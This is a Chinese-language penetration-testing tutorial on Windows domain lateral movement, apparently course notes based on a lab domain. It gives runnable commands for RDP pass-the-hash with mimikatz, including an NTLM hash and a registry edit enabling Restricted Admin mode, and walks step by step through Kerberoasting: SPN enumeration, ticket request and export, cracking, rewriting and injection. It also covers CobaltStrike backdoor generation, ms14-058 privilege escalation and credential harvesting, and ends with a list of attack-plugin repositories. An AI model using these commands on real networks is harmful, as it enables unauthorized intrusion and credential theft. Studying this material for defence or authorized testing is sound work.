内网安全-域横向CobaltStrike&SPN&RDP

案例1-域横向移动RDP传递-Mimikatz

除了上述讲到的IPC，WMI，SMB等协议的链接外，获取到的明文密码或HASH密文也可以通过RDP协议进行链接操作。

RDP协议连接：判断对方远程桌面服务是否开启（默认：3389），端口扫描判断

当得到密码时，如果对方开启了3389端口，可以直接进行连接并登陆

RDP明文密码链接
1.windows: mstsc
2.mstsc.exe /console /v:192.168.3.21 /admin
3.linux: rdesktop 192.168.3.21:3389

RDP密文HASH链接
windows Server需要开启 Restricted Admin mode，在Windows 8.1和Windows Server 2012 R2中默认开启，
同时如果Win 7 和Windows Server 2008 R2安装了2871997、2973351补丁也支持；

开启命令：
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

开启后运行：
1.mstsc.exe /restrictedadmin
2.mimikatz.exe
3.privilege::debug
4.sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7 "/run:mstsc.exe /restrictedadmin"

案例2-域横向移动SPN服务-探针,请求,导出,破解,重写

1探针
setspn -q */*
setspn -q */* | findstr "MSSQL"

2请求票据
# 删除缓存票据
klist purge

# powershell请求
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "xxxx"

# mimikatz请求
mimikatz.exe "kerberos::ask /target:xxxx"

# 查看票据
klist

3导出票据
# mimikatz
mimikatz.exe "kerberos::list /export"

4破解票据
# 破解工具tgsrepcrack.py python3环境运行
python tgsrepcrack.py passwd.txt xxxx.kirbi
python3 .\tgsrepcrack.py .\password.txt .\1-40a00000-jerry@MSSQLSvc~Srv-DB-0day.0day.org~1433-0DAY.ORG.kirbi

5重写票据
python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -u 500
python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -g 512
mimikatz.exe kerberos::ptt xxxx.kirbi # 将生成的票据注入内存

6利用
dir //xxx.xxx.xxx.xxx/c$

查看域内所有SPN服务列表

查看域内指定的spn服务

案例3-域横向移动测试流程一把梭哈-CobaltStrike初体验

1.关于启动及配置讲解

linux上需配置java环境才可启动

linux上启动后，本地打开bat文件
输入linux的ip以及设置的密码即可连接打开

因为这是一个团队工具，可以多人去连接linux上的CobaltStrike
可以通过配置监听器来区分自己与别人攻击的目标

HTTP Hosts为生成的后门执行后回弹的ip，保存后即对设置的ip进行监听

生成后门

将生成的后门与监听器绑定，当这个后门触发后，绑定的对应监听器就会上线

将后门上传到目标主机并执行，执行后这里显示目标已经上线

进入命令终端

2.关于提权及插件加载

提权

打开后，自带的插件只有两个

可手动导入插件

选择插件目录中的cna文件

选中插件，点击upload加载

重新打开，选择相应的exp进行攻击

选择对应的监听器，攻击成功后进行回弹

点击后，就会用ms14-058对目标主机进行攻击

如果速度过慢的话，这里把sleep设置为1或者0

此时图标上多了一个连接的用户为system，证明已经提权成功
可以打开命令窗口执行命令

3.关于信息收集命令讲解

通过命令net view探针当前的网络环境

可以通过targets查看，查看当前所有探针的信息，非常方便


net dclist获取当前域控主机信息

shell net user /domain
调用cmd去执行net use /domain命令，获取域内所有用户名称

将mimikatz上传后，可直接通过CobaltStrike去执行

执行完后可通过此处直接查看mimikatz收集的信息

对192.168.3.32进行攻击

选择之前通过mimikatz获取的其他主机的口令密码尝试连接
Listener：选择监听器
Session：选择通过哪个主机的权限去连接攻击目标机

4.通过第三方工具

上面通过密码尝试连接时，总不能一个一个密码手动去尝试连接，所以可以借助第三方工具

将第三方工具文件上传到主机

CobaltStrike Aggressor 脚本合集（可以自行在GitHub搜索）：

https://github.com/harleyQu1nn/AggressorScripts
https://github.com/Und3rf10w/Aggressor-scripts
https://github.com/001SPARTaN/aggressor_scripts
https://github.com/rasta-mouse/Aggressor-Script
https://github.com/threatexpress/aggressor-scripts
https://github.com/ramen0x3f/AggressorScripts
https://github.com/FortyNorthSecurity/AggressorAssessor
https://github.com/michalkoczwara/aggressor_scripts_collection
https://github.com/ars3n11/Aggressor-Scripts
https://github.com/gaudard/scripts/tree/master/red-team/aggressor
https://github.com/bluscreenofjeff/AggressorScripts
https://github.com/vysecurity/Aggressor-VYSEC
https://github.com/killswitch-GUI/CobaltStrike-ToolKit
https://github.com/rsmudge/ElevateKit （第三方提权攻击）
https://github.com/QAX-A-Team/CobaltStrike-Toolset
https://github.com/DeEpinGh0st/Erebus （Erebus CobaltStrike后渗透测试插件，持续更新）
https://github.com/branthale/CobaltStrikeCNA
https://github.com/pandasec888/taowu-cobalt-strike（仓库已关闭）